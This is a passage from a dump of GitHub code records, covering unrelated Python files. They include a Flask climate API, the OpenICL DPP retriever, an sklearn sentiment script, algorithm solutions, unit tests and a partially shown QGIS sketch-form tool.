fake.random_element(products)\n invoice = fake.random_element(invoices)\n invoice_product = InvoiceProducts(\n product_rl=product,\n invoice_rl=invoice\n )\n db.session.add(invoice_product)\n\n db.session.commit()\n\nif __name__ == \"__main__\":\n with app.app_context():\n db.app = app # Bind the app to the current SQLAlchemy instance\n delete_data()\n db.session.commit()\n seed_data()\n db.session.commit()\n \n print(\"🦸♀️ Done seeding!\")\n","repo_name":"Bii-teki/bloom-beauty-backend","sub_path":"seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":7966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"19547927799","text":"def solution(n, wires):\n answer = n\n for wire in wires:\n tmp = wires[:]\n tmp.remove(wire)\n num = count_num(tmp, wire[0]) + 1\n if answer > abs(n - 2 * num):\n answer = abs(n - 2 * num)\n return answer\n\ndef count_num(arr, num):\n tmp = []\n left = []\n answer = 0\n for i in arr:\n if i[0] == num:\n left.append(i[1])\n elif i[1] == num:\n left.append(i[0])\n else:\n tmp.append(i)\n if left == []:\n return 0\n else:\n for j in left:\n answer += count_num(tmp, j)\n return answer + len(left)\n","repo_name":"MinHoon-LEE/Ps_Sql","sub_path":"Programmers/Algorithm/Python/86971/86971.py","file_name":"86971.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"35319890071","text":"\"\"\"DPP Retriever\"\"\"\n\nfrom openicl import DatasetReader\nfrom openicl.icl_retriever.icl_topk_retriever import TopkRetriever\nfrom openicl.utils.logging import get_logger\nfrom typing import Optional\nimport tqdm\nimport numpy as np\nimport math\nfrom accelerate import Accelerator\n\nlogger = get_logger(__name__)\n\n\nclass DPPRetriever(TopkRetriever):\n \"\"\"DPP In-context Learning Retriever Class\n Class of DPP Retriever.\n Two-stage DPP is used, where first stage is to get results of TopK to reduce candidate sets\n chechout https://arxiv.org/abs/2302.05698 for details.\n \n Attributes:\n dataset_reader (:obj:`DatasetReader`): An instance of the :obj:`DatasetReader` class.\n ice_separator (:obj:`str`, optional): A string that separates each in-context example.\n ice_eos_token (:obj:`str`, optional): A string that is added to the end of in-context examples.\n prompt_eos_token (:obj:`str`, optional): A string that is added to the end of the prompt.\n ice_num (:obj:`int`, optional): The number of data in the in-context examples.\n index_split (:obj:`str`, optional): A string for the index dataset name. The index dataset is used to select data for in-context examples. Defaults to ``train``.\n test_split (:obj:`str`, optional): A string for the generation dataset name. The test dataset is used to generate prompts for each data. Defaults to ``test``.\n index_ds (:obj:`Dataset`): The index dataset. Used to select data for in-context examples.\n test_ds (:obj:`Dataset`): The test dataset. Used to generate prompts for each data.\n accelerator (:obj:`Accelerator`, optional): An instance of the :obj:`Accelerator` class, used for multiprocessing.\n batch_size (:obj:`int`, optional): Batch size for the :obj:`DataLoader`. \n model (:obj:`SentenceTransformer`): An instance of :obj:`SentenceTransformer` class, used to calculate embeddings.\n tokenizer (:obj:`AutoTokenizer`): Tokenizer for :obj:`model`.\n index (:obj:`IndexIDMap`): Index generated with FAISS.\n seed (:obj:`int`, optional): Seed for the random number generator. (:obj:`random_state` in :obj:`sample_exact_k_dpp` method)\n scale_factor (:obj:`float`, optional): A factor when gets the kernel.\n \"\"\"\n model = None\n\n def __init__(self,\n dataset_reader: DatasetReader,\n ice_separator: Optional[str] = '\\n',\n ice_eos_token: Optional[str] = '\\n',\n prompt_eos_token: Optional[str] = '',\n sentence_transformers_model_name: Optional[str] = 'all-mpnet-base-v2',\n ice_num: Optional[int] = 1,\n candidate_num: Optional[int] = 1,\n index_split: Optional[str] = 'train',\n test_split: Optional[str] = 'test',\n tokenizer_name: Optional[str] = 'gpt2-xl',\n batch_size: Optional[int] = 1,\n accelerator: Optional[Accelerator] = None,\n seed: Optional[int] = 1,\n scale_factor: Optional[float] = 0.1\n ) -> None:\n super().__init__(dataset_reader, ice_separator, ice_eos_token, prompt_eos_token,\n sentence_transformers_model_name, ice_num, index_split, test_split, tokenizer_name, batch_size,\n accelerator)\n self.candidate_num = candidate_num\n self.seed = seed\n self.scale_factor = scale_factor\n\n def dpp_search(self):\n res_list = self.forward(self.dataloader, process_bar=True, information=\"Embedding test set...\")\n rtr_idx_list = [[] for _ in range(len(res_list))]\n logger.info(\"Retrieving data for test set...\")\n for entry in tqdm.tqdm(res_list, disable=not self.is_main_process):\n idx = entry['metadata']['id']\n\n # get TopK results\n embed = np.expand_dims(entry['embed'], axis=0)\n near_ids = np.array(self.index.search(embed, self.candidate_num)[1][0].tolist())\n\n # DPP stage\n near_reps, rel_scores, kernel_matrix = self.get_kernel(embed, near_ids.tolist())\n\n # MAP inference\n samples_ids = fast_map_dpp(kernel_matrix, self.ice_num)\n\n # ordered by relevance score\n samples_scores = np.array([rel_scores[i] for i in samples_ids])\n samples_ids = samples_ids[(-samples_scores).argsort()].tolist()\n rtr_sub_list = [int(near_ids[i]) for i in samples_ids]\n\n rtr_idx_list[idx] = rtr_sub_list\n\n return rtr_idx_list\n\n def retrieve(self):\n return self.dpp_search()\n\n def get_kernel(self, embed, candidates):\n near_reps = np.stack([self.index.index.reconstruct(i) for i in candidates], axis=0)\n # normalize first\n embed = embed / np.linalg.norm(embed)\n near_reps = near_reps / np.linalg.norm(near_reps, keepdims=True, axis=1)\n\n # to make kernel-matrix non-negative\n rel_scores = np.matmul(embed, near_reps.T)[0]\n rel_scores = (rel_scores + 1) / 2\n\n # to prevent overflow error\n rel_scores -= rel_scores.max()\n\n # to balance relevance and diversity\n rel_scores = np.exp(rel_scores / (2 * self.scale_factor))\n\n # to make kernel-matrix non-negative\n sim_matrix = np.matmul(near_reps, near_reps.T)\n sim_matrix = (sim_matrix + 1) / 2\n\n kernel_matrix = rel_scores[None] * sim_matrix * rel_scores[:, None]\n return near_reps, rel_scores, kernel_matrix\n\n\ndef fast_map_dpp(kernel_matrix, max_length):\n \"\"\"\n fast implementation of the greedy algorithm\n reference: https://github.com/laming-chen/fast-map-dpp/blob/master/dpp_test.py\n paper: Fast Greedy MAP Inference for Determinantal Point Process to Improve Recommendation Diversity\n \"\"\"\n item_size = kernel_matrix.shape[0]\n cis = np.zeros((max_length, item_size))\n di2s = np.copy(np.diag(kernel_matrix))\n selected_items = list()\n selected_item = np.argmax(di2s)\n selected_items.append(int(selected_item))\n while len(selected_items) < max_length:\n k = len(selected_items) - 1\n ci_optimal = cis[:k, selected_item]\n di_optimal = math.sqrt(di2s[selected_item])\n elements = kernel_matrix[selected_item, :]\n eis = (elements - np.dot(ci_optimal, cis[:k, :])) / di_optimal\n cis[k, :] = eis\n di2s -= np.square(eis)\n selected_item = np.argmax(di2s)\n selected_items.append(int(selected_item))\n return selected_items\n","repo_name":"Shark-NLP/OpenICL","sub_path":"openicl/icl_retriever/icl_dpp_retriever.py","file_name":"icl_dpp_retriever.py","file_ext":"py","file_size_in_byte":6538,"program_lang":"python","lang":"en","doc_type":"code","stars":460,"dataset":"github-code","pt":"7"}
+{"seq_id":"60682937","text":"from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\nimport pickle\n\ndf = pd.read_csv('dataset/imdb.txt', names=['sentence', 'label'], sep='\\t')\nsentences=df.sentence\ny = df.label\nsentences_train, sentences_test, y_train, y_test = train_test_split(sentences, y, test_size=0.25, random_state=1000)\nvectorizer = CountVectorizer()\nvectorizer.fit(sentences_train)\nX_train = vectorizer.transform(sentences_train)\nX_test = vectorizer.transform(sentences_test)\nmodel = LogisticRegression()\nmodel.fit(X_train, y_train)\nscore = model.score(X_test, y_test)\nprint(\"Accuracy:{}\".format(score) )\n\n#save model\npickle.dump(vectorizer, open('vectorizer','wb'))\npickle.dump(model, open('model', 'wb'))\n\n#predict sample\nsample=[\"Movie was awesome\",\"Movie was bad\"]\ntest=vectorizer.transform(sample)\nres=model.predict(test)\nfor i in res:\n if(abs(i)>abs(1-i)):\n print(\"pos\")\n else:\n print(\"neg\")\n","repo_name":"AMAN2202/Movie_Review_Classification_using_Neural_Network_and_API","sub_path":"nlp/modelling/nlp/logistic.py","file_name":"logistic.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"16786408822","text":"import numpy as np\n\nmaxID = 0\nids = np.arange(1033)\nseats = []\nwith open(\"data.txt\", \"r\") as file:\n for line in file.read().split(\"\\n\"):\n seat = sum([int(i) * 2 ** j for j, i in enumerate(line.replace(\"L\", \"0\").replace(\"R\", \"1\").replace(\"F\", \"0\").replace(\"B\", \"1\")[::-1])])\n seats.append(seat)\n if seat > maxID:\n maxID = seat\nprint(maxID)\nfree = np.asarray([i for i in ids if i not in seats])\nyour = free[np.where(np.gradient(free) != 1)[0][1]]\nprint(your)","repo_name":"Haakooto/AdventOfCode","sub_path":"2020/05/binary_boarding.py","file_name":"binary_boarding.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"32961591276","text":"# Dependencies\nimport datetime as dt\nimport numpy as np\nimport pandas as pd\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\n# Set up database engine\nengine = create_engine(\"sqlite:///hawaii.sqlite\")\n\n# Reflect database into classes\nBase = automap_base()\nBase.prepare(engine, reflect=True)\n\n# Create a variable for each class\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n# Create session link from Python to database\nsession = Session(engine)\n\n# Define flask app\napp = Flask(__name__)\n\n# Define welcome route\n@app.route(\"/\")\n\n# Create function for routing information\ndef welcome():\n return(\n '''\n Welcome to the Climate Analysis API!\n Available Routes:\n /api/v1.0/precipitation\n /api/v1.0/stations\n /api/v1.0/tobs\n /api/v1.0/temp/start/end\n ''')\n\n# Define precipitation route\n@app.route(\"/api/v1.0/precipitation\")\n\n# Create precipitation function\ndef precipitation():\n # Calculate date one year ago from date in database\n prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n # Query for date/precipitation for previous year\n precipitation = session.query(Measurement.date, Measurement.prcp).filter(Measurement.date >= prev_year).all()\n # Use jsonify() to romat results into JSON structured file (dictionary)\n precip = {date: prcp for date, prcp in precipitation}\n return jsonify(precip)\n\n# Define station route\n@app.route(\"/api/v1.0/stations\")\n\n# Create station function\ndef stations():\n # Collect all stations\n results = session.query(Station.station).all()\n # Unravel results into one-dimensional array, then a list, then jsonify\n stations = list(np.ravel(results))\n return jsonify(stations=stations)\n\n# Define temperature route\n@app.route(\"/api/v1.0/tobs\")\n\n# Create temp function\ndef temp_monthly():\n # Calculate date one year ago from date in database\n prev_year = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n # Query primary station for all temps from previous year\n results = session.query(Measurement.tobs).filter(Measurement.station == 'USC00519281').filter(Measurement.date >= prev_year).all()\n # Unravel results into one-dimensional array, then a list\n temps = list(np.ravel(results))\n # jsonify results\n return jsonify(temps=temps)\n\n# Define status route\n@app.route(\"/api.v1.0/temp/\")\n@app.route(\"/api.v1.0/temp//\")\n\n# Create stats function including start and end parameters\ndef stats(start=None, end=None):\n sel = [func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)]\n\n if not end:\n results = session.query(*sel).\\\n filter(Measurement.date >= start).all()\n temps = list(np.ravel(results))\n return jsonify(temps)\n\n results = session.query(*sel).\\\n filter(Measurement.date >= start).\\\n filter(Measurement.date <= end).all()\n temps = list(np.ravel(results))\n return jsonify(temps)","repo_name":"HollyC13/surfs_up","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"28482076905","text":"import os\nimport zipfile\nfrom pathlib import Path\nfrom unittest import TestCase\nfrom unittest.mock import patch, MagicMock\n\nfrom drover.io import ArchiveMapping, get_digest, get_relative_file_names, write_archive\n\n\nclass TestGetDigest(TestCase):\n def test_zero_file_digest_is_none(self):\n assert get_digest(tuple()) is None\n\n\nclass TestGetRelativeFileNames(TestCase):\n def test_without_excludes(self):\n expected_source_path = '/'\n expected_relative_file_names = set((\n Path('file_0'),\n Path('path_a/file_a_0'),\n Path('path_a/file_a_1'),\n Path('path_b/file_b_0')))\n expected_walk = (\n ('/', ('path_a', 'path_b',), ('file_0',)),\n ('/path_a', (), ('file_a_0', 'file_a_1')),\n ('/path_b', (), ('file_b_0',)),\n )\n with patch.object(os, 'walk', return_value=expected_walk) as mock_walk:\n names = set(get_relative_file_names(expected_source_path))\n mock_walk.assert_called_once_with(str(expected_source_path))\n assert names == expected_relative_file_names\n\n\nclass TestWriteArchive(TestCase):\n def test_write_empty_archive(self):\n expected_archive_file_name = Path('archive.zip')\n mock_zip_file = MagicMock(spec=zipfile.ZipFile)\n with patch.object(zipfile, 'ZipFile') as mock_zip_file_cls:\n mock_zip_file_cls.return_value.__enter__.return_value = mock_zip_file\n write_archive(expected_archive_file_name, [])\n mock_zip_file_cls.assert_called_once_with(\n expected_archive_file_name, 'w',\n compression=zipfile.ZIP_DEFLATED,\n compresslevel=9)\n mock_zip_file.write.assert_not_called()\n\n def test_write_non_empty_archive(self):\n expected_archive_file_name = Path('archive.zip')\n expected_archive_mappings = [\n ArchiveMapping(source_file_name=Path('source/a'), archive_file_name=Path('archive/a')),\n ArchiveMapping(source_file_name=Path('source/b'), archive_file_name=Path('archive/b')),\n ]\n mock_zip_file = MagicMock(spec=zipfile.ZipFile)\n with patch.object(zipfile, 'ZipFile') as mock_zip_file_cls:\n mock_zip_file_cls.return_value.__enter__.return_value = mock_zip_file\n write_archive(expected_archive_file_name, expected_archive_mappings)\n mock_zip_file_cls.assert_called_once_with(\n expected_archive_file_name, 'w',\n compression=zipfile.ZIP_DEFLATED,\n compresslevel=9)\n for expected_archive_mapping in expected_archive_mappings:\n mock_zip_file.write.assert_any_call(\n filename=expected_archive_mapping.source_file_name,\n arcname=expected_archive_mapping.archive_file_name)\n","repo_name":"jwilges/drover","sub_path":"tests/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"}
+{"seq_id":"43661620568","text":"import os\n\nfrom corcym.settings import PATH_P\n\npath = PATH_P\nfiles = os.listdir(path)\n\nif files:\n for f in files:\n rm_path = PATH_P + f\"{f}\"\n os.remove(rm_path)\n","repo_name":"talhaumer/corcym","sub_path":"seeding-scripts/removefiles.py","file_name":"removefiles.py","file_ext":"py","file_size_in_byte":178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"24129543870","text":"import re\nimport unicodedata\n\n\ndef _format_size(value, digits, unit):\n if digits > 0:\n return \"{{:.{}f}}{}\".format(digits, unit).format(value)\n else:\n return \"{{:d}}{}\".format(unit).format(value)\n\n\ndef format_size(bytes_, digits=1):\n if bytes_ < 1024:\n return _format_size(bytes_, digits, \"B\")\n\n kilo = bytes_ / 1024\n if kilo < 1024:\n return _format_size(kilo, digits, \"kB\")\n\n mega = kilo / 1024\n if mega < 1024:\n return _format_size(mega, digits, \"MB\")\n\n return _format_size(mega / 1024, digits, \"GB\")\n\n\ndef format_duration(total_seconds):\n total_seconds = int(total_seconds)\n hours = total_seconds // 3600\n remainder = total_seconds % 3600\n minutes = remainder // 60\n seconds = total_seconds % 60\n\n if hours:\n return \"{} h {} min\".format(hours, minutes)\n\n if minutes:\n return \"{} min {} sec\".format(minutes, seconds)\n\n return \"{} sec\".format(seconds)\n\n\ndef read_int(msg, min, max, default):\n msg = msg + \" [default {}]: \".format(default)\n\n while True:\n try:\n val = input(msg)\n if not val:\n return default\n if min <= int(val) <= max:\n return int(val)\n except ValueError:\n pass\n\n\ndef slugify(value):\n re_pattern = re.compile(r'[^\\w\\s-]', flags=re.U)\n re_spaces = re.compile(r'[-\\s]+', flags=re.U)\n value = str(value)\n value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('ascii')\n value = re_pattern.sub('', value).strip().lower()\n return re_spaces.sub('-', value)\n","repo_name":"GaspardIV/twitchautocut","sub_path":"twitchdl/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"21356390645","text":"from django import template\nfrom django.template.defaulttags import register\nfrom todo.models import Task\n\n\nclass TaskPriorityNode(template.Node):\n def __init__(self, priority_level):\n self.priority_level = template.Variable(priority_level)\n\n def render(self, context):\n try:\n priority_level_value = self.priority_level.resolve(context)\n\n return \"\".format(Task.priority_label(priority_level_value))\n except template.VariableDoesNotExist:\n return ''\n\n@register.tag(name=\"task_priority\")\ndef do_task_priority(parser, token):\n try:\n tag_name, priority_level = token.split_contents()\n except ValueError:\n raise template.TemplateSyntaxError(\n \"%r tag requires a single argument\" % token.contents.split()[0]\n )\n\n return TaskPriorityNode(priority_level)","repo_name":"dwolosowicz/django-todo-app","sub_path":"project/todo/templatetags/task_priority.py","file_name":"task_priority.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"1797467836","text":"import qgis, qgis.utils, os, datetime, PIL, platform\n\nif platform.system() == \"Windows\":\n from PIL import ImageGrab\nfrom PIL.ImageQt import ImageQt\n\nfrom qgis.PyQt import uic, QtCore, QtGui\nfrom qgis.PyQt.QtWidgets import QWidget, QMainWindow, QSpinBox, QAction, QDialog, QFrame\n\nfrom Lamia.qgisiface.iface.qgiswidget.tools.lamia_abstractformtool import (\n AbstractLamiaFormTool,\n)\nfrom .lamia_form_pictureviewer import PictureViewer\n\nbase3 = QtCore.QObject()\n\n\nclass BaseSketchTool(AbstractLamiaFormTool):\n\n PREPROTOOLNAME = \"sketch\"\n DBASETABLENAME = \"media\"\n LOADFIRST = False\n\n tooltreewidgetCAT = QtCore.QCoreApplication.translate(\"base3\", \"Resources\")\n tooltreewidgetSUBCAT = QtCore.QCoreApplication.translate(\"base3\", \"Sketches\")\n\n tooltreewidgetICONPATH = os.path.join(\n os.path.dirname(__file__), \"lamia_form_sketch_icon.png\"\n )\n\n tempparentjoin = {}\n linkdict = {\n \"colparent\": \"id_object\",\n \"colthistable\": \"id_resource\",\n \"tctable\": \"tcobjectresource\",\n \"tctablecolparent\": \"lid_object\",\n \"tctablecolthistable\": \"lid_resource\",\n }\n for tablename in [\n \"deficiency\",\n \"observation\",\n \"node\",\n \"edge\",\n \"surface\",\n \"equipment\",\n \"facility\",\n ]:\n tempparentjoin[tablename] = linkdict\n PARENTJOIN = tempparentjoin\n\n TABLEFILTERFIELD = {\"typemedia\": \"CRO\"}\n GEOMETRYSKIP = True\n\n def __init__(self, **kwargs):\n super(BaseSketchTool, self).__init__(**kwargs)\n\n def initMainToolWidget(self):\n # ****************************************************************************************\n # userui\n self.toolwidgetmain = UserUI()\n self.formtoolwidgetconfdictmain = {\n \"media\": {\"linkfield\": \"id_media\", \"widgets\": {}},\n \"object\": {\"linkfield\": \"id_object\", \"widgets\": {}},\n \"resource\": {\"linkfield\": \"id_ressource\", \"widgets\": {}},\n }\n\n # self.groupBox_geom.setParent(None)\n # self.frame_editing.setVisible(False)\n self.toolwidgetmain.stackedWidget.setCurrentIndex(1)\n\n self.toolwidgetmain.pushButton_open.clicked.connect(self.openFile)\n self.toolwidgetmain.pushButton_edit.clicked.connect(self.editPhoto)\n self.toolwidgetmain.pushButton_getfromclipboard.clicked.connect(self.pasteImage)\n self.editorwindow = ScribbleMainWindow(parentwdg=self)\n self.photowdg = PictureViewer()\n self.toolwidgetmain.frame_cr.layout().addWidget(self.photowdg)\n\n def postSelectFeature(self):\n\n if self.currentFeaturePK is None: # first time\n datecreation = str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n self.formutils.applyResultDict(\n {\"resource\": {\"datetimeresource\": datecreation}}\n )\n self.editorwindow.reinitSize()\n self.editorwindow.clear()\n self.photowdg.clear()\n\n else:\n sql = \"SELECT file FROM media_qgis WHERE pk_media = \" + str(\n self.currentFeaturePK\n )\n file = self.dbase.query(sql)[0][0]\n if (\n file is not None\n and file != \"\"\n and os.path.isfile(self.dbase.completePathOfFile(file))\n ):\n self.editorwindow.openImage(self.dbase.completePathOfFile(file))\n self.formutils.showImageinLabelWidget(\n self.photowdg, self.dbase.completePathOfFile(file)\n )\n else:\n self.editorwindow.clear()\n self.photowdg.clear()\n\n def pasteImage(self):\n if platform.system() == \"Windows\":\n pilimage = PIL.ImageGrab.grabclipboard()\n if pilimage is not None:\n im = ImageQt(pilimage)\n self.editorwindow.setImage(im)\n self.photowdg.clear()\n self.photowdg.setPixmap(im)\n self.editPhoto()\n\n def editPhoto(self):\n if qgis.utils.iface is not None:\n self.editorwindow.show()\n else:\n self.editorwindow.setWindowModality(QtCore.Qt.ApplicationModal)\n self.editorwindow.show()\n\n def openFile(self):\n if self.currentFeaturePK is not None:\n sql = \"SELECT file FROM media_qgis WHERE pk_media = \" + str(\n self.currentFeaturePK\n )\n query = self.dbase.query(sql)\n # result = [row[0] for row in query]\n resultfile = query[0][0]\n if os.path.isfile(self.dbase.completePathOfFile(resultfile)):\n filepath = self.dbase.completePathOfFile(resultfile)\n os.startfile(filepath)\n\n \"\"\"\n def createParentFeature(self):\n pkobjet = self.dbase.createNewObjet()\n\n if False:\n # lastrevision = self.dbase.maxrevision\n datetimecreation = str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n lastobjetid = self.dbase.getLastId('Objet') + 1\n sql = \"INSERT INTO Objet (id_objet, lpk_revision_begin, datetimecreation ) \"\n sql += \"VALUES(\" + str(lastobjetid ) + \",\" + str(self.dbase.maxrevision) + \",'\" + datetimecreation + \"');\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n pkobjet = self.dbase.getLastRowId('Objet')\n\n lastressourceid = self.dbase.getLastId('Ressource') + 1\n sql = \"INSERT INTO Ressource (id_ressource, lpk_objet) \"\n sql += \"VALUES(\" + str(lastressourceid) + \",\" + str(pkobjet) + \");\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n pkres = self.dbase.getLastRowId('Ressource')\n\n\n\n\n\n pkphoto = self.currentFeaturePK\n lastidphoto = self.dbase.getLastId('Photo') + 1\n datecreation = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n datetimecreation = str(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n\n fileimage = os.path.join('.', self.dbasetablename, ''.join(datecreation.split('-')),\n str(lastidphoto) + '_croquis.png')\n if not os.path.exists(os.path.dirname(self.dbase.completePathOfFile(fileimage))):\n os.makedirs(os.path.dirname(self.dbase.completePathOfFile(fileimage)))\n self.editorwindow.saveImage(self.dbase.completePathOfFile(fileimage))\n\n\n sql = \"UPDATE Photo SET id_photo = \" + str(lastidphoto) + \",\"\n sql += \"lpk_ressource = \" + str(pkres)\n sql += \", typephoto = 'CRO' \"\n sql += \" WHERE pk_photo = \" + str(pkphoto) + \";\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n\n\n sql = \"UPDATE Ressource SET file = '\" + fileimage + \"', datetimeressource = '\" + datetimecreation + \"'\"\n sql += \" WHERE pk_ressource = \" + str(pkres) + \";\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n\n if self.parentWidget is not None and self.parentWidget.currentFeature is not None:\n # self.linkagespec = {'Tcobjetressource'\n if 'Tcobjetressource' in self.linkagespec.keys():\n #get parent id_objet\n sql = \" SELECT id_objet FROM \" + self.parentWidget.dbasetablename.lower() + \"_qgis\"\n sql += \" WHERE pk_\" + self.parentWidget.dbasetablename.lower() + \" = \" + str(self.parentWidget.currentFeaturePK)\n currentparentlinkfield = self.dbase.query(sql)[0][0]\n\n #currentparentlinkfield = self.parentWidget.currentFeature['id_objet']\n sql = \"INSERT INTO Tcobjetressource(lpk_revision_begin, lid_objet, lid_ressource) \"\n sql += \" VALUES(\" + str(self.dbase.maxrevision) + \",\" + str(currentparentlinkfield) + ',' + str(lastressourceid) + \")\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n\n\n if False:\n #lastrevision = self.dbase.getLastPk('Revision')\n lastrevision = self.dbase.maxrevision\n datecreation = QtCore.QDate.fromString(str(datetime.date.today()), 'yyyy-MM-dd').toString('yyyy-MM-dd')\n lastobjetid = self.dbase.getLastId('Objet') + 1\n sql = \"INSERT INTO Objet (id_objet, id_revisionbegin, datecreation ) \"\n sql += \"VALUES(\" + str(lastobjetid ) + \",\" + str(lastrevision) + \",'\" + datecreation + \"');\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n #idobjet = self.dbase.getLastRowId('Objet')\n\n\n lastressourceid = self.dbase.getLastId('Ressource') + 1\n sql = \"INSERT INTO Ressource (id_ressource, id_revisionbegin, id_objet) \"\n sql += \"VALUES(\" + str(lastressourceid) + \",\" + str(lastrevision) + \",\" + str(lastobjetid) + \");\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n lastressourcepk = self.dbase.getLastRowId('Ressource')\n\n\n pkcroquis = self.currentFeature.id()\n lastidcroquis = self.dbase.getLastId('Photo') + 1\n\n fileimage = os.path.join('.', self.dbasetablename, ''.join(datecreation.split('-')),\n str(lastidcroquis) + '_croquis.png')\n if not os.path.exists(os.path.dirname(self.dbase.completePathOfFile(fileimage))):\n os.makedirs(os.path.dirname(self.dbase.completePathOfFile(fileimage)))\n self.editorwindow.saveImage(self.dbase.completePathOfFile(fileimage))\n\n\n\n sql = \"UPDATE Photo SET id_objet = \" + str(lastobjetid) + \",\"\n sql += \"id_ressource = \" + str(lastressourceid) + \",\"\n sql += \"id_photo = \" + str(lastidcroquis) + \",\"\n sql += \"id_revisionbegin = \" + str(lastrevision) + \",\"\n sql += \"typephoto = 'CRO' \"\n sql += \" WHERE pk_photo = \" + str(pkcroquis) + \";\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n\n sql = \"UPDATE Ressource SET file = '\" + fileimage + \"', dateressource = '\" + datecreation + \"'\"\n sql += \" WHERE pk_ressource = \" + str( lastressourcepk) + \";\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n\n\n\n if self.parentWidget is not None and self.parentWidget.currentFeature is not None:\n currentparentlinkfield = self.parentWidget.currentFeature['id_objet']\n sql = \"INSERT INTO Tcobjetressource(id_tcobjet, id_tcressource,id_revisionbegin) \"\n sql += \" VALUES(\" + str(currentparentlinkfield) + \", \" + str(lastressourceid) + \",\" + str(lastrevision) + \");\"\n query = self.dbase.query(sql)\n self.dbase.commit()\n \"\"\"\n\n def widgetClicked(self, **kwargs):\n super().widgetClicked(**kwargs)\n if self.currentFeaturePK is None:\n self.photowdg.clear()\n\n def postSaveFeature(self, savedfeaturepk=None):\n\n if self.currentFeaturePK is None: # first creation\n idphoto, pkres = self.dbase.getValuesFromPk(\n self.DBASETABLENAME.lower() + \"_qgis\",\n [\"id_\" + self.DBASETABLENAME.lower(), \"pk_resource\"],\n savedfeaturepk,\n )\n datecreation = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n datetimecreation = str(\n datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n )\n\n # sql = \"UPDATE media SET mediatype = 'CRO' WHERE pk_photo = {}\".format(str(savedfeaturepk))\n # query = self.dbase.query(sql)\n\n fileimage = os.path.join(\n \".\",\n self.DBASETABLENAME,\n \"\".join(datecreation.split(\"-\")),\n str(idphoto) + \"_sketch.png\",\n )\n if not os.path.exists(\n os.path.dirname(self.dbase.completePathOfFile(fileimage))\n ):\n os.makedirs(os.path.dirname(self.dbase.completePathOfFile(fileimage)))\n\n sql = (\n \"UPDATE resource SET file = '\"\n + fileimage\n + \"', datetimeresource = '\"\n + datetimecreation\n + \"'\"\n )\n sql += \" WHERE pk_resource = \" + str(pkres)\n query = self.dbase.query(sql)\n\n else:\n fileimage = self.dbase.getValuesFromPk(\n self.DBASETABLENAME + \"_qgis\", \"file\", self.currentFeaturePK\n )\n\n self.editorwindow.saveImage(self.dbase.completePathOfFile(fileimage))\n\n\nclass UserUI(QWidget):\n def __init__(self, parent=None):\n super(UserUI, self).__init__(parent=parent)\n uipath = os.path.join(os.path.dirname(__file__), \"lamia_form_media_ui.ui\")\n uic.loadUi(uipath, self)\n\n\nclass ScribbleMainWindow(QMainWindow):\n def __init__(self, parentwdg=None, parent=None):\n super(ScribbleMainWindow, self).__init__(parent=parent)\n uipath = os.path.join(\n os.path.dirname(__file__), \"lamia_form_sketch_drawingwdg_ui.ui\"\n )\n uic.loadUi(uipath, self)\n self.parentwdg = parentwdg\n self.scribbleArea = ScribbleArea(parent=self)\n self.scribbleArea.clearImage()\n self.scribbleArea.mainWindow = self # maybe not using this?\n\n self.scrollArea.setWidget(self.scribbleArea)\n\n self.toolbar = self.addToolBar(\"Color\")\n self.colorwdg = qgis.gui.QgsColorButton()\n self.colorwdg.setColor(QtCore.Qt.black)\n self.toolbar.addWidget(self.colorwdg)\n self.spinb = QSpinBox()\n self.spinb.setValue(3)\n self.toolbar.addWidget(self.spinb)\n\n self.spinb.valueChanged.connect(self.scribbleArea.setPenWidth)\n self.colorwdg.colorChanged.connect(self.scribbleArea.setPenColor)\n\n self.clearAction = QAction(\"Clear\", self)\n self.clearAction.triggered.connect(self.scribbleArea.clearImage)\n self.toolbar.addAction(self.clearAction)\n\n self.reinitAction = QAction(\"reinit\", self)\n self.reinitAction.triggered.connect(self.scribbleArea.reinit)\n 